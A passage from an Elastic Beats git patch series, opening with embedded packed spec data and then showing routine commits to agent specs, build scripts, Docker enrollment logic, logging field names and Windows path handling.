packer.MustUnpack("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") + unpacked := packer.MustUnpack("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") SupportedMap = make(map[string]Spec) for f, v := range unpacked { diff --git a/x-pack/elastic-agent/spec/apm-server.yml b/x-pack/elastic-agent/spec/apm-server.yml index d86e77fb0ffb..589972ecad6c 100644 --- a/x-pack/elastic-agent/spec/apm-server.yml +++ b/x-pack/elastic-agent/spec/apm-server.yml @@ -3,6 +3,19 @@ cmd: apm-server artifact: apm-server args: ["-E", "management.enabled=true", "-E", "management.mode=x-pack-fleet", "-E", "apm-server.data_streams.enabled=true"] rules: + - copy_to_list: + item: fleet + to: inputs + on_conflict: noop + - map: + path: fleet + rules: + - remove_key: + key: access_api_key + - remove_key: + key: reporting + - remove_key: + key: agent - fix_stream: {} - filter_values: selector: inputs @@ -13,4 +26,5 @@ rules: selectors: - inputs - output + - fleet when: length(${inputs}) > 0 and hasKey(${output}, 'elasticsearch') From 9ab347ec530acf5c9f9c2d0d7dac3dae06476564 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Thu, 11 Feb 2021 08:48:12 +0000 Subject: [PATCH 23/63] [Release] Configure GOPATH=HOME otherwise GOPATH=GOROOT (#23980) --- .gitignore | 1 + dev-tools/common.bash | 10 ++++++++++ 2 files changed, 11 insertions(+) diff --git a/.gitignore b/.gitignore index 4f2f4f719b9f..2f5a63889a9b 100644 --- a/.gitignore +++ b/.gitignore @@ -23,6 +23,7 @@ coverage.out .python-version beat.db *.keystore +go_env.properties mage_output_file.go x-pack/functionbeat/*/fields.yml x-pack/functionbeat/provider/*/functionbeat-* diff --git a/dev-tools/common.bash b/dev-tools/common.bash index d6c37fbff4ce..c65666526bf6 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -42,8 +42,18 @@ setup_go_root() { local version=${1} export PROPERTIES_FILE=go_env.properties GO_VERSION="${version}" .ci/scripts/install-go.sh + + # Setup GOROOT and add go to the PATH. # shellcheck disable=SC1090 source "${PROPERTIES_FILE}" 2> /dev/null + + # Setup GOPATH and add GOPATH/bin to the PATH. + if [ -d "${HOME}" ] ; then + setup_go_path "${HOME}" + else + setup_go_path "${GOROOT}" + fi + debug "$(go version)" } From 3cb6ab4c4938a4ac0f46c56000e066cb1660df2e Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Thu, 11 Feb 2021 10:34:11 +0000 Subject: [PATCH 24/63] Release: dump the environment context (#23990) --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index 8a1b982baca3..6080779c7bb8 100644 --- a/Makefile +++ b/Makefile @@ -197,6 +197,7 @@ snapshot: ## release : Builds a release. .PHONY: release release: beats-dashboards + @mage dumpVariables @$(foreach var,$(BEATS) $(PROJECTS_XPACK_PKG),$(MAKE) -C $(var) release || exit 1;) @$(foreach var,$(BEATS) $(PROJECTS_XPACK_PKG), \ test -d $(var)/build/distributions && test -n "$$(ls $(var)/build/distributions)" || exit 0; \ From 3ce47ca1814d89b69c65bef553862c98d2ffda13 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Thu, 11 Feb 2021 12:46:47 +0000 Subject: [PATCH 25/63] Dump packages and platforms env variables (#23994) --- dev-tools/mage/settings.go | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/dev-tools/mage/settings.go b/dev-tools/mage/settings.go index 037d4838d035..9640af73e278 100644 --- a/dev-tools/mage/settings.go +++ b/dev-tools/mage/settings.go @@ -60,6 +60,8 @@ var ( XPackDir = "../x-pack" RaceDetector = false TestCoverage = false + PLATFORMS = EnvOr("PLATFORMS", "") + PACKAGES = EnvOr("PACKAGES", "") // CrossBuildMountModcache, if true, mounts $GOPATH/pkg/mod into // the crossbuild images at /go/pkg/mod, read-only. @@ -160,6 +162,8 @@ func varMap(args ...map[string]interface{}) map[string]interface{} { "GOARCH": GOARCH, "GOARM": GOARM, "Platform": Platform, + "PLATFORMS": PLATFORMS, + "PACKAGES": PACKAGES, "BinaryExt": BinaryExt, "XPackDir": XPackDir, "BeatName": BeatName, @@ -203,6 +207,8 @@ BeatLicense = {{.BeatLicense}} BeatURL = {{.BeatURL}} BeatUser = {{.BeatUser}} VersionQualifier = {{.Qualifier}} +PLATFORMS = {{.PLATFORMS}} +PACKAGES = {{.PACKAGES}} ## Functions From e3da3bef5028a3866a76d9434ab999edf5bbe0fb Mon Sep 17 00:00:00 2001 From: Marcin Tojek Date: Thu, 11 Feb 2021 15:05:27 +0100 Subject: [PATCH 26/63] Fix: select default agent policy if no enrollment token provided (#23973) * Fix: select default agent policy if no enrollment token provided * Update CHANGELOG --- .../templates/docker/docker-entrypoint.elastic-agent.tmpl | 7 ++++++- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl index d4c8d6e4645f..c51a13432579 100644 --- a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl +++ b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl @@ -37,9 +37,14 @@ function enroll(){ exit $exitCode fi echo $enrollResp - local apikeyId=$(echo $enrollResp | jq -r '.list[0].id') + local apikeyId=$(echo $enrollResp | jq -r '.list[] | select((.name | startswith("Default ")) and (.active == true)) | .id') echo $apikeyId + if [[ -z "${$apikeyId}" ]]; then + echo "Default agent policy was not found. Please consider using own enrollment token (FLEET_ENROLLMENT_TOKEN)." + exit 1 + fi + enrollResp=$(curl ${KIBANA_HOST:-http://localhost:5601}/api/fleet/enrollment-api-keys/$apikeyId \ -H 'Content-Type: application/json' \ -H 'kbn-xsrf: true' \ diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 3d2d4551475a..38b0e57ef2b7 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -29,6 +29,7 @@ - Fix sysv init files for deb/rpm installation {pull}22543[22543] - Fix shell wrapper for deb/rpm packaging {pull}23038[23038] - Fixed parsing of npipe URI {pull}22978[22978] +- Select default agent policy if no enrollment token provided. {pull}23973[23973] - Remove artifacts on transient download errors {pull}23235[23235] - Support for linux/arm64 {pull}23479[23479] - Skip top level files when unziping archive during upgrade {pull}23456[23456] From 1c10a1c90d1d38b78640239b8e96f977fac3aca6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Thu, 11 Feb 2021 15:11:16 +0100 Subject: [PATCH 27/63] Crossbuilding of functions only supported on AMD64 (#23999) --- x-pack/functionbeat/magefile.go | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/x-pack/functionbeat/magefile.go b/x-pack/functionbeat/magefile.go index a317bd0cb71f..95861a3f0f2e 100644 --- a/x-pack/functionbeat/magefile.go +++ b/x-pack/functionbeat/magefile.go @@ -10,6 +10,7 @@ import ( "fmt" "os" "path/filepath" + "runtime" "time" "github.com/magefile/mage/mg" @@ -89,6 +90,7 @@ func BuildGoDaemon() error { // CrossBuild cross-builds the beat for all target platforms. func CrossBuild() error { + // Building functionbeat manager err := devtools.CrossBuild() if err != nil { @@ -107,6 +109,11 @@ func CrossBuild() error { continue } + if runtime.GOARCH != "amd64" { + fmt.Println("Crossbuilding functions only works on amd64 architecture.") + return nil + } + err := devtools.CrossBuild(devtools.AddPlatforms("linux/amd64"), devtools.InDir("x-pack", "functionbeat", "provider", provider.Name)) if err != nil { return err From 7b6f338852482838189567611dd68dd1fcc078ca Mon Sep 17 00:00:00 2001 From: Lee Hinman <57081003+leehinman@users.noreply.github.com> Date: Thu, 11 Feb 2021 08:17:18 -0600 Subject: [PATCH 28/63] [Filebeat] change httpjson logging (#23972) - change "source" key to "input_source" - change "url" key to "input_url" - "source" and "url" were conflicting with ECS fields --- CHANGELOG.next.asciidoc | 1 + filebeat/input/v2/input-cursor/input.go | 2 +- x-pack/filebeat/input/httpjson/input.go | 2 +- x-pack/filebeat/input/httpjson/internal/v2/input.go | 2 +- 4 files changed, 4 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index a2cc2c10da88..cf8a8350f683 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -381,6 +381,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] - Fix various processing errors in the Suricata module. {pull}23236[23236] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] *Heartbeat* diff --git a/filebeat/input/v2/input-cursor/input.go b/filebeat/input/v2/input-cursor/input.go index 2efc9ea93a80..c8f770336ed3 100644 --- a/filebeat/input/v2/input-cursor/input.go +++ b/filebeat/input/v2/input-cursor/input.go @@ -117,7 +117,7 @@ func (inp *managedInput) Run( // refine per worker context inpCtx := ctx inpCtx.ID = ctx.ID + "::" + source.Name() - inpCtx.Logger = ctx.Logger.With("source", source.Name()) + inpCtx.Logger = ctx.Logger.With("input_source", source.Name()) if err = inp.runSource(inpCtx, inp.manager.store, source, pipeline); err != nil { cancel() diff --git a/x-pack/filebeat/input/httpjson/input.go b/x-pack/filebeat/input/httpjson/input.go index 0c86d8e530e3..ca2e43483d1b 100644 --- a/x-pack/filebeat/input/httpjson/input.go +++ b/x-pack/filebeat/input/httpjson/input.go @@ -125,7 +125,7 @@ func run( publisher cursor.Publisher, cursor *cursor.Cursor, ) error { - log := ctx.Logger.With("url", config.URL) + log := ctx.Logger.With("input_url", config.URL) stdCtx := ctxtool.FromCanceller(ctx.Cancelation) diff --git a/x-pack/filebeat/input/httpjson/internal/v2/input.go b/x-pack/filebeat/input/httpjson/internal/v2/input.go index 8cf78b8adc7f..f9c76226818a 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/input.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/input.go @@ -104,7 +104,7 @@ func run( publisher inputcursor.Publisher, cursor *inputcursor.Cursor, ) error { - log := ctx.Logger.With("url", config.Request.URL) + log := ctx.Logger.With("input_url", config.Request.URL) stdCtx := ctxtool.FromCanceller(ctx.Cancelation) From d1e8b253da0ff1e944a4706d2ee69ebb36665310 Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Thu, 11 Feb 2021 15:20:25 +0100 Subject: [PATCH 29/63] [Ingest Manager] Windows agent doesn't uninstall with a lowercase `c:` drive in the path (#23998) [Ingest Manager] Windows agent doesn't uninstall with a lowercase `c:` drive in the path (#23998) --- x-pack/elastic-agent/CHANGELOG.asciidoc | 1 + .../pkg/agent/install/installed.go | 2 +- .../elastic-agent/pkg/agent/install/paths.go | 5 +++ .../pkg/agent/install/paths_darwin.go | 5 +++ .../pkg/agent/install/paths_test.go | 33 +++++++++++++++++++ .../pkg/agent/install/paths_windows.go | 7 ++++ 6 files changed, 52 insertions(+), 1 deletion(-) create mode 100644 x-pack/elastic-agent/pkg/agent/install/paths_test.go diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index 5e520a596c21..d94ad8aee0d8 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -33,6 +33,7 @@ - Fixed reenroll scenario {pull}23686[23686] - Fixed Monitoring filebeat and metricbeat not connecting to Agent over GRPC {pull}23843[23843] - Fixed make status readable in the log. {pull}23849[23849] +- Windows agent doesn't uninstall with a lowercase `c:` drive in the path {pull}23998[23998] ==== New features diff --git a/x-pack/elastic-agent/pkg/agent/install/installed.go b/x-pack/elastic-agent/pkg/agent/install/installed.go index 9f294078242d..cc39bc15eac8 100644 --- a/x-pack/elastic-agent/pkg/agent/install/installed.go +++ b/x-pack/elastic-agent/pkg/agent/install/installed.go @@ -58,7 +58,7 @@ func RunningInstalled() bool { execDir = filepath.Dir(filepath.Dir(execDir)) execPath = filepath.Join(execDir, execName) } - return expected == execPath + return ArePathsEqual(expected, execPath) } // checkService only checks the status of the service. diff --git a/x-pack/elastic-agent/pkg/agent/install/paths.go b/x-pack/elastic-agent/pkg/agent/install/paths.go index 5936c31926ab..b6dc11fb4900 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths.go @@ -28,3 +28,8 @@ const ( exec /opt/Elastic/Agent/elastic-agent $@ ` ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return expected == actual +} diff --git 